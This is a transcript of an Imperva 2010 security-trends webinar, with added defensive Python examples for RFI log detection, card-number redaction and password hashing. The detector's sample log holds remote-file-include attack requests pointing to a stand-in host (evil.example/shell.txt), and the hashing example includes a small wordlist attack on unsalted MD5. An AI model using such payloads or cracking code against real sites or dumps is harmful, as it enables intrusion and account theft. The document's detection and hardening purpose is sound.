Imperva ADC Webinar Series: Top 5 Security Trends for 2010

Top 5 Security Trends for 2010
Noa Bar-Yosef, Security Research Engineer, Imperva
Imperva Background
 Focuses on Application Data Security and Compliance
 Application Defense Center (ADC)
+ Research organization headed by Amichai Shulman
+ Security analysis
+ Vulnerability discovery
+ Compliance expertise
+ Threat research
+ Education
Agenda
 Scorecard for 2009 Security Trends
 2010 Top Security Trends
+ Emerging threats, vendor security notification policies, and new
security tactics
+ Strategies to mitigate today’s security threats
 Q&A
Scorecard for 2009 Security Trends
Trend: Score
1. Disclosure becoming irresponsible: A-
2. Economics to affect threat level: A
3. Surge of cloud related threats: C
4. Evolution of automated attacks: A+
5. Increased threat to business applications (e.g. SAP): C
6. Proliferation of CSRF: D
#1 - The Industrialization of Hacking
 Hacking is becoming a profitable industry
 The foundations of any industry can be
identified within hacking
+ Building layered roles (supply chain)
+ Horizontal expertise
+ Resource optimization
+ Automation
 Individual or political hacking hasn’t
ceased, but it has become a secondary
threat
The Industrialization of Hacking
Layered Roles
 Detect vulnerabilities and develop
exploits
+ Hardcore “hackers” with strong technical
capabilities
+ Stay clear of actual targets
+ Provide the building blocks for others
 Grow botnets
+ Groups devoted to controlling as many
zombies as possible
+ Complex operations (will discuss later)
+ Provide zombies from the botnet for use
by perpetrators
The Industrialization of Hacking
Layered Roles (cont.)
 Exploit targets
+ Groups that make use of zombies for various purposes
+ Send spam
+ Collect data
+ Inflict DoS
 Consumers
+ Monetize information
– Credit card fraud
– Identity theft
+ Advertise through spam
+ Blackmail
The Industrialization of Hacking
Resource Optimization
 “Nothing goes to waste”
 Each workstation or application, once
compromised, is exploited in one way or
another as part of the industrial food chain
 Compromised Applications
+ Direct value (fund transfer, credit card information, etc.)
+ Indirect value (credentials to other systems)
+ Malware distribution
+ Blackhat SEO
+ Command & Control
The Industrialization of Hacking
Resource Optimization (cont.)
 Workstations
+ Keylogger for grabbing credentials
+ Specialized malware for man-in-the-browser attacks
+ General purpose Trojan to use as part of a botnet
+ Relay into internal networks
The Industrialization of Hacking
Automation
 The core of the industrial process, growing botnets and
exploiting targets, is mostly automated
 Selecting target applications through search engines
 Compromise applications using captured zombies
+ Configuration and commands distributed through forums and web
pages
 Sometimes the compromise is
through search engine abuse
The Industrialization of Hacking
Automation (cont.)
 Templates and kits exist for everything
+ Remote file include
+ Phishing of various applications
+ Botnet client (ASPROX, Zeus, Clampi, etc.)
 Looking at the numbers from attack campaigns
clearly shows the power of automation
+ Last month we heard of 132K sites
compromised in one campaign
+ We tracked a similar campaign 3 weeks prior
and saw the same flaw exploited in the same way
across hundreds of sites
 Techniques are becoming more sophisticated
+ Randomized DNS in order to avoid C&C hijacking
The Industrialization of Hacking
Our Advice
 We are no longer fighting script kiddies or sporadic
hacking attempts; we are fighting Hackers Inc.
 Cannot hide from the problem.
+ Small and large applications alike
+ Servers or workstations
+ It’s not personal.
 Smaller organizations
+ Must start paying attention to application security
+ Either directly or through their hosting providers
 Organizations must look for tools to help them detect and
mitigate automation properly
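The advice above is to detect automation rather than individual exploits. The script below is an added example for this page, not Imperva's code: it parses web access logs, picks out remote-file-include (RFI) shaped requests (a parameter whose value is itself an absolute URL, the pattern the RFI kits mentioned later in this deck produce), and then reports two campaign indicators: sources that sweep many distinct scripts within a short window, and remote payload hosts shared by several sources. The log lines, IP addresses, hostnames and thresholds are constructed for illustration.

```python
"""Spot automated remote-file-include (RFI) campaigns in web access logs.

Added example for this page, not Imperva's code. The log lines, IPs and
hostnames below are constructed; the RFI heuristic and thresholds are
assumptions, not a complete signature set.
"""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qsl, urlsplit

# Apache "combined"-style prefix: ip ident user [time] "METHOD path PROTO" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# RFI kits pass an absolute URL as a parameter value, e.g.
# index.php?page=http://evil.example/shell.txt?  (the trailing "?" turns
# whatever the vulnerable include() appends into a harmless query string).
RFI_SCHEMES = ("http://", "https://", "ftp://")

# Constructed sample: one source sweeps three scripts in eight seconds, a
# second source fires a single probe, and both pull the same remote payload.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jan/2010:12:00:01 +0000] "GET /index.php?page=http://evil.example/shell.txt? HTTP/1.1" 200 512',
    '198.51.100.4 - - [10/Jan/2010:12:00:02 +0000] "GET /gallery.php?inc=http://evil.example/shell.txt? HTTP/1.1" 200 640',
    '203.0.113.7 - - [10/Jan/2010:12:00:04 +0000] "GET /modules/show.php?file=http://evil.example/shell.txt? HTTP/1.1" 404 210',
    '192.0.2.55 - - [10/Jan/2010:12:00:05 +0000] "GET /index.php?page=about HTTP/1.1" 200 3120',
    '203.0.113.7 - - [10/Jan/2010:12:00:09 +0000] "GET /admin/view.php?tpl=ftp://evil.example/s.txt HTTP/1.1" 200 500',
]


def parse_line(line):
    """Split one access-log line into ip, timestamp, script path and query params."""
    m = LOG_RE.match(line)
    if not m:
        return None
    event = m.groupdict()
    event["ts"] = datetime.strptime(event["ts"], TS_FMT)
    parts = urlsplit(event["path"])
    event["script"] = parts.path
    event["params"] = parse_qsl(parts.query, keep_blank_values=True)
    return event


def rfi_payloads(params):
    """Return the remote hosts referenced by RFI-shaped parameter values."""
    hosts = []
    for _, value in params:
        if value.lower().startswith(RFI_SCHEMES):
            hosts.append(urlsplit(value).hostname or value)
    return hosts


def analyze(lines, window_seconds=60, min_scripts=3):
    """Report scanner IPs (many distinct scripts probed within a short window)
    and the payload hosts shared across sources, which tie individual probes
    together into one campaign."""
    by_ip = defaultdict(list)
    by_host = defaultdict(set)
    for line in lines:
        event = parse_line(line)
        if event is None:
            continue
        hosts = rfi_payloads(event["params"])
        if not hosts:
            continue  # ordinary traffic, not an RFI attempt
        by_ip[event["ip"]].append(event)
        for host in hosts:
            by_host[host].add(event["ip"])

    scanners = {}
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e["ts"])
        span = (events[-1]["ts"] - events[0]["ts"]).total_seconds()
        scripts = {e["script"] for e in events}
        if len(scripts) >= min_scripts and span <= window_seconds:
            scanners[ip] = {"scripts": len(scripts), "span_seconds": span}
    payload_hosts = {host: sorted(ips) for host, ips in by_host.items()}
    return {"scanners": scanners, "payload_hosts": payload_hosts}


if __name__ == "__main__":
    report = analyze(SAMPLE_LOG)
    for ip, info in report["scanners"].items():
        print(f"scanner {ip}: {info['scripts']} scripts in {info['span_seconds']:.0f}s")
    for host, ips in report["payload_hosts"].items():
        print(f"payload host {host} used by {len(ips)} source(s): {', '.join(ips)}")
```

The single probe from 198.51.100.4 would not trip a per-source rate rule on its own; it is the shared payload host that links it to the sweep from 203.0.113.7, which is the kind of cross-source correlation that distinguishes a campaign from noise.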
#2 – From Application Security to Data Security
 The ’90s were all about network related security problems
(connecting enterprise networks to the Internet) and network
security solutions (Network Firewall)
 Throughout this decade we’ve seen a shift of activity towards
web application attacks
+ Network security becomes a commodity and network attacks become
harder to execute
+ At the turn of the century eCommerce and online services took a
steep climb. Attacker motivation increases as applications expose
more information and more functionality.
+ It is far easier to access data through applications designed to
manipulate it
From application security to data security
Web Application Security is No Longer Enough
 Internal threat still prominent
 Many internal applications are not web based
 Web application security can be effectively applied to major
internal applications but not all of them
 Many times internal users have (authorized) direct access to
the database
 Once data from an application flows into a workstation it’s on the
loose
 Regulations require that specific types of data be tracked
From applications security to data security
Continuous Data Security
 Track access to sensitive and regulated data throughout its
lifecycle
 Basic information lifecycle
+ Most sensitive and regulated data can be traced back to structured
storage (SQL databases)
+ Sensitive information may be transformed into unstructured format
and placed in document storage and management system (File
shares, MS Sharepoint, EMC Documentum)
+ Data is processed in workstations and may leave the enterprise
boundaries through email, WebMail, file transfer and physical media
From applications security to data security
Our Advice
 Controls around individual data repositories
+ Database access monitoring
+ File activity monitoring
 Controls to track data in process
+ Next generation of DLP products
+ Integrate with DRM
 Collaboration between data security products
+ Policies expressed in terms of information type based on content,
rather than table and file names
+ Track specific pieces of information as they leave the database, flow
through web applications, are transformed into files and flow through
outgoing channels.
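The last point, policies expressed in terms of information type based on content rather than table and file names, is the part that needs working code to be concrete. The example below is added for this page and is not Imperva's code: it finds payment card numbers by content (a digit-run pattern confirmed with the Luhn check) in any field of a record, whatever the column is called, and masks them before the data flows out through a channel such as e-mail. The record, field names and card numbers are constructed (the card numbers are the usual publicly known test numbers).

```python
"""Classify and redact data by content (Luhn-valid card numbers) rather than
by table, column or file names.

Added example for this page, not Imperva's code. The record below is
constructed; the card numbers are well-known test numbers.
"""
import re

# 13 to 19 digits, optionally separated by spaces or hyphens, not glued to
# further digits on either side.
CANDIDATE_RE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")

# Constructed record. The column named "credit_card" holds nothing sensitive,
# while two innocently named columns do; "order_id" is a 16-digit number that
# a naive digit-pattern rule would flag but the Luhn check rejects.
SAMPLE_RECORD = {
    "customer": "John Q. Public",
    "credit_card": "none",
    "notes": "Customer card 4111 1111 1111 1111 on file, call before shipping",
    "payment_ref": "4012888888881881",
    "order_id": "1234567890123456",
}


def luhn_ok(digits):
    """Luhn checksum: doubles every second digit from the right."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def _digits(text):
    return re.sub(r"\D", "", text)


def _is_card(candidate):
    digits = _digits(candidate)
    return 13 <= len(digits) <= 19 and luhn_ok(digits)


def find_card_numbers(text):
    """Return the normalised (separator-free) card numbers found in text."""
    return [_digits(m.group()) for m in CANDIDATE_RE.finditer(text) if _is_card(m.group())]


def redact(text):
    """Mask each card number down to its last four digits; leave other digit runs alone."""
    def _mask(m):
        return "****" + _digits(m.group())[-4:] if _is_card(m.group()) else m.group()
    return CANDIDATE_RE.sub(_mask, text)


def classify_record(record):
    """Map field name -> card numbers found in it, keyed on content alone."""
    hits = {}
    for name, value in record.items():
        numbers = find_card_numbers(str(value))
        if numbers:
            hits[name] = numbers
    return hits


def redact_record(record):
    """Copy of the record safe to hand to an outgoing channel."""
    return {name: redact(str(value)) for name, value in record.items()}


if __name__ == "__main__":
    print("sensitive fields:", classify_record(SAMPLE_RECORD))
    print("outbound copy:", redact_record(SAMPLE_RECORD))
```

The Luhn check is only a plausibility filter, not a proof that a number is a live card; it is there to keep order numbers and timestamps from flooding the alert queue. A production classifier would combine it with issuer prefix ranges and context keywords, and would run the same content test at each stage of the lifecycle the slide describes (database, file share, outgoing mail), which is exactly what name-based policies cannot do once the data has been copied into a free-text column or an attachment.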
#3 – Social networks expose larger societies
 Past: Specific parts of the population
+ Young adults of the Internet generation
 Today / Future: Everyone and their
dog have a Facebook account
+ Younger, immature audience
– Kids making their first steps into the virtual
society
+ Conservative adult community
– People who otherwise have very conservative
web access behavior
+ Senior community
– People whose trust models are deeply rooted
in the old world (my grandmother)
Social networks expose larger societies
Pandemic Threats
 There are three distinctive pillars to social
networks that make them a perfect fit for
online pandemic threats:
+ Huge crowds
+ Inherently expose personal information
+ Built-in mechanisms for implicit and explicit trust
generation between loosely coupled individuals
 Attackers can push their “merchandise” to larger
unsuspecting crowds with higher than ever success rates
+ Use the implicit trust
+ Abuse the abundance of personal information to create more trust
Social networks expose larger societies
The Evolution of an Octopus
 Social networks are becoming social platforms
+ Integrating MMORPG (e.g. Farmville), 3rd party apps
+ More opportunities for trust abuse
– ClickJacking through Farmville gifts
+ Less control over the robustness of integrated applications
 Integrating social networks into other domains
+ Google, Bing and Yahoo! integrating Twitter and Facebook results
+ Promoting malware just became
much easier!
Social networks expose larger societies
The Evolution of an Octopus
 Integrating social networks into the enterprise
+ HR systems, CRM systems
+ Creating a Möbius strip of information, mixing
internal and external trust
Example of a recruiting e-mail shown on the slide:
Dear John,
We'd like your help to spread the word about our open jobs. If you follow the link
below and install this application on your Facebook profile page, your friends will
be able to see, apply and forward our jobs. The best part is that if your friend, or a
friend of a friend, applies for a job and is hired, you will automatically get credit for
the employee referral through Jobvite. You will be eligible for the referral bonus.
To install the application, please follow this link:
here
Best regards,
Sue
Social networks expose larger societies
Our Advice - Redefining Trust
 Social networks are all about novelty
+ We can expect them to rush new features out at the expense of
security
+ As more 3rd party apps are created we cannot expect those to
consider any security at all
 We need tools to help us evaluate trust in huge, dynamic,
virtual societies
+ These are starting to show up as research projects or initial offerings
from various vendors
 Security tools and policies should be able to build on these
trust systems
#4 – Credentials are the New Credit Card Numbers
 Dramatic surge in the number of data compromise incidents
+ Credit card numbers
+ Personal details
 Price levels per single stolen record are constantly dropping
+ Attackers are looking for more profitable targets
 We clearly see an increased level of activity around hacking
user credentials for online applications
Application credentials are the new CCNs
Motivation
 Credit card numbers are harder to monetize
+ Need to purchase goods and cash those out
 Personal details are even harder to monetize
+ Cannot be used in masses
+ Require additional fraud (involving identity theft)
 The premise of application credentials
+ Easier to monetize
+ Higher value per record
Application credentials are the new CCNs
Motivation (cont.)
 Financial applications
+ Can be easily converted into hard cash through online transactions
(fund transfers, stock trading, etc.)
 Enterprise in the cloud (SalesForce.com, GoogleDocs, etc.)
+ Access to sensitive commercial information
+ Can be traded for money, used for fraudulent transactions and even
blackmail
 Web mail
+ Direct access to personal details
+ Further access to the above mentioned applications
+ SPAM
Application credentials are the new CCNs
Tools of the Trade
 Keyloggers
+ Cleartext passwords
+ Once a computer is infected quality data is flowing in
+ Requires massive infected botnets
 Phishing attacks
+ Cleartext passwords
+ Low quality data
+ Low success rates
 Application compromise (e.g. SQL injection)
+ Sometimes hashed (digested) passwords that need further cracking
+ High quality data
+ Huge numbers
Application credentials are the new CCNs
Our Advice
 Protect your web-facing applications
+ Defeat attacks
 Store hashed (digested) passwords, salted and slow to compute
+ Defeat exposure in case of compromise
 Use safe password recovery procedures
+ Avoid automatic leveraging of another compromise
 Include two factor authentication
+ When possible
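"Store digested passwords" is the advice that most often goes wrong in practice, because an unsalted fast digest such as MD5 barely slows an attacker who has dumped the table through the SQL injection described on the previous slide. The example below is added for this page and is not Imperva's code; it puts the weak scheme beside a salted, iterated one (PBKDF2-HMAC-SHA256 from Python's standard library with a constant-time comparison) and shows why the weak one falls to a precomputed table. The wordlist, passwords and iteration count are constructed or assumed.

```python
"""Password storage: unsalted digest vs salted, iterated hash.

Added example for this page, not Imperva's code. Wordlist, passwords and
the iteration count are constructed/assumed; tune ITERATIONS so one
verification costs tens of milliseconds on your own hardware.
"""
import base64
import hashlib
import hmac
import os

ITERATIONS = 100_000  # assumption; raise as hardware gets faster

# Constructed wordlist standing in for the attacker's dictionary.
WORDLIST = ["123456", "password1", "qwerty", "letmein", "iloveyou"]


def _b64(raw):
    return base64.b64encode(raw).decode("ascii")


def weak_store(password):
    """The "digested" storage many 2010-era applications used: unsalted MD5.
    Identical passwords produce identical digests across every user and site."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def crack_with_table(weak_hash, wordlist):
    """One pass over the wordlist builds a table that cracks every unsalted
    digest in a dumped table at once; this is why unsalted storage gives the
    'high quality data, huge numbers' the previous slide describes."""
    table = {weak_store(word): word for word in wordlist}
    return table.get(weak_hash)


def strong_store(password, salt=None):
    """Salted, iterated hash. The per-user random salt defeats precomputed
    tables; the iteration count makes each guess expensive."""
    if salt is None:
        salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    # Self-describing record so the parameters can be raised later without
    # invalidating existing accounts.
    return "pbkdf2_sha256$%d$%s$%s" % (ITERATIONS, _b64(salt), _b64(dk))


def strong_verify(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    try:
        algo, iters, salt_b64, dk_b64 = stored.split("$")
        if algo != "pbkdf2_sha256":
            return False
        salt = base64.b64decode(salt_b64)
        expected = base64.b64decode(dk_b64)
        iterations = int(iters)
    except (ValueError, TypeError):
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return hmac.compare_digest(dk, expected)


if __name__ == "__main__":
    dumped = weak_store("password1")           # what an attacker gets from the database
    print("weak digest cracked to:", crack_with_table(dumped, WORDLIST))
    record = strong_store("password1")
    print("strong record:", record)
    print("verify correct:", strong_verify("password1", record))
    print("verify wrong:  ", strong_verify("password2", record))
```

Two users with the same password get different `strong_store` records, so an attacker who dumps the table must attack each account separately and pay the full iteration cost per guess; with `weak_store` one lookup table covers the whole dump. A memory-hard function such as scrypt or Argon2 is the better choice where available, but the salt-and-iterate structure shown here is the minimum that makes "digested" storage meaningful.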
#5 – Proactive Security
 To date, security practice has been largely reactive
+ Wait for a vulnerability to be disclosed
+ Create a signature (or some other security rule)
+ Cross reference requests against these attack methods, regardless of
their context in time or source
 As a consequence security decisions are becoming more
difficult and resource consumption (machine as well as
human) is growing
+ Distinguishing “bad” requests from “good” requests based on request
content alone becomes more difficult and more time consuming
+ Not only machine resources but also human resources as more
decisions cannot be taken automatically
+ This is completely inadequate in a world of growing attack rates
Proactive security
Tired of Being a Sitting Duck?
 Rather than waiting to be attacked, security research teams
are starting to proactively look for attacker activity as it is being
initiated over the network
 Traditionally used for longer term research, proactive
intelligence operations can be used for immediate security
value:
+ Identify compromised computers being actively exploited to launch
attacks
+ Quickly identify attack campaigns at their early stages
+ Discover 0 day vulnerabilities in the wild rather than in the lab
+ Identify targets of upcoming attacks in advance
Proactive security
Military Intelligence is a Contradiction in Terms*
 There are different techniques for gathering timely
intelligence
+ Some techniques, especially related to the SPAM domain have
already been in use for a couple of years
 Some techniques are based on a network of sensors. Basic
types of sensors:
+ Setting up targets for attacks (fake web applications, mailboxes to
receive spam, etc.)
+ Setting up communication channels for use by attackers (anonymous
proxies, TOR relays)
+ Network sniffers in strategic locations
+ Tap into C&C servers
*Groucho Marx
Proactive security
Military Intelligence (cont.)
 Other techniques are more laborious
+ Reverse engineering of new malware to identify C&C servers
+ Hijack domain names intended for use by botnets
+ Tap into hacker discussions in forums and
 Existing projects and commercial offerings for various types of
threats (sample):
+ DShield (General reputation for IPs)
+ ShadowServer (Botnet oriented)
+ Cyveillance (Phishing and compromised servers)
+ Project Honeypot (Spam related)
Proactive security
Our Advice
 Engaging in proactive security requires
substantial research resources – don’t expect
to do it yourself
 Some solutions (mainly around endpoint
security) are incorporating data obtained
through proactive security
 Next generation of enterprise solutions will
include integration of data obtained from
proactive security projects and providers
 Add proactive security to your wish list when
looking at enterprise solutions
Security Trends that just missed the Top 5
Questions & Answers
ADC Data Security Webinar Series